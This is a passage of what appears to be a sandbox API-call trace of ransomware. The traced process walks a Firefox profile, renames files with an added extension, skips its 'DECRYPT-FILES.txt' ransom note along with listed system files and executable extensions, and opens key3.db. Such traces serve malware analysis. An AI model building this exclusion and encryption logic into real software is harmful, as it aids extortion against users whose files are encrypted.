[0081.390] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.390] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.390] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.390] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.390] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.390] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.390] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.390] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.390] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.391] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.391] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.391] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.391] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.391] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.391] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.391] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.391] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.391] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.391] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.391] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.391] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.391] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.391] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.391] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.391] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.391] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.391] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.391] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.392] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.392] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.392] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.392] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.392] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.392] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.392] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.392] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.392] lstrcpyA (in: lpString1=0x3f2c088, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.392] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.392] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0081.392] wsprintfW (in: param_1=0x3f2cd40, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KvhCz") returned 153 [0081.392] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KvhCz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.kvhcz"), dwFlags=0x0) returned 1 [0081.393] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.394] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.394] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.394] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0081.394] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0081.394] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.394] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.394] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.394] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.394] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.395] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.395] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.395] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned 122 [0081.395] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.395] lstrcpyW (in: lpString1=0x3f2d540, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\" [0081.395] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\jkbimi8.tmp" [0081.395] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.395] CloseHandle (hObject=0x0) returned 0 [0081.395] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.395] FindNextFileW (in: hFindFile=0x5f8e18, lpFindFileData=0x3f2dd70 | out: lpFindFileData=0x3f2dd70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac989f40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac989f40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac989f40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0081.395] FindClose (in: hFindFile=0x5f8e18 | out: hFindFile=0x5f8e18) returned 1 [0081.395] CloseHandle (hObject=0x470) returned 1 [0081.396] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.396] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.396] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.396] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.396] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.396] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.396] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.396] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0081.396] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.396] lstrcpyW (in: lpString1=0x3f2d7bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0081.396] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\jkbimi8.tmp" [0081.396] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.396] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.397] CloseHandle (hObject=0x0) returned 0 [0081.397] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.397] FindNextFileW (in: hFindFile=0x5f8dd8, lpFindFileData=0x3f2dfec | out: lpFindFileData=0x3f2dfec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac8cb860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac8cb860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac8cb860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0081.397] FindClose (in: hFindFile=0x5f8dd8 | out: hFindFile=0x5f8dd8) returned 1 [0081.397] CloseHandle (hObject=0x468) returned 1 [0081.398] FindNextFileW (in: hFindFile=0x5f8d98, lpFindFileData=0x3f2e268 | out: lpFindFileData=0x3f2e268*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="moz-safe-about+home\\", cAlternateFileName="MOZ-SA~1")) returned 0 [0081.398] FindClose (in: hFindFile=0x5f8d98 | out: hFindFile=0x5f8d98) returned 1 [0081.398] CloseHandle (hObject=0x460) returned 1 [0081.398] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0081.398] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0081.398] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.398] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0081.398] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0081.398] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0081.398] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0081.398] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.398] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0081.398] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.398] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\jkbimi8.tmp" [0081.398] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.399] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0081.399] CloseHandle (hObject=0x0) returned 0 [0081.399] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.399] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4815eb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4815eb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x853f60d0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="key3.db", cAlternateFileName="")) returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="DECRYPT-FILES.txt") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="autorun.inf") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="boot.ini") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="desktop.ini") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat") returned -1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="iconcache.db") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="bootsect.bak") returned 1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="ntuser.dat.log") returned -1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="thumbs.db") returned -1 [0081.399] lstrcmpiW (lpString1="key3.db", lpString2="Bootfont.bin") returned 1 [0081.399] lstrlenW (lpString="key3.db") returned 7 [0081.399] lstrcmpiW (lpString1="db", lpString2="lnk") returned -1 [0081.399] lstrcmpiW (lpString1="db", lpString2="exe") returned -1 [0081.399] lstrcmpiW (lpString1="db", lpString2="sys") returned -1 [0081.399] lstrcmpiW (lpString1="db", lpString2="dll") returned -1 [0081.400] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.400] lstrlenW (lpString="key3.db") returned 7 [0081.400] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.400] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="key3.db" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\key3.db" [0081.400] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.400] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 